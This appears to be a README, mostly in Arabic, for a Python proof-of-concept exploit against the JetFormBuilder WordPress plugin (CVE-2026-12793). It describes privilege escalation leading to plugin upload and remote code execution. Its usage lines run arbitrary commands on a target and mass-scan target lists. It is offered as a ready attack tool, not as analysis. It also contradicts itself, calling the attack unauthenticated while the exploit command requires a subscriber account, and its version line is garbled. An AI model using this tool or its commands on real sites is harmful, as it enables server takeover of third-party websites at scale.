
إثبات مفهوم بلغة Python للثغرة CVE-2026-12793 في JetFormBuilder <= 3.6.2: تصعيد صلاحيات دون مصادقة يؤدي إلى رفع إضافة وتنفيذ تعليمات برمجية عن بُعد، مع وضعي الفحص والمسح الشامل.
تصعيد صلاحيات بدون مصادقة → رفع إضافة → تنفيذ تعليمات برمجية عن بُعد (RCE).
<= 3.6.2>= 3.6.3# Check single target
python poc.py -u https://target.example --mode check
# Full exploit (requires an existing low-privilege account)
python poc.py -u https://target.example --mode exploit \
-nu subscriber -np 'Password123' -c id
# Mass scan
python poc.py -l targets.txt --mode check -t 30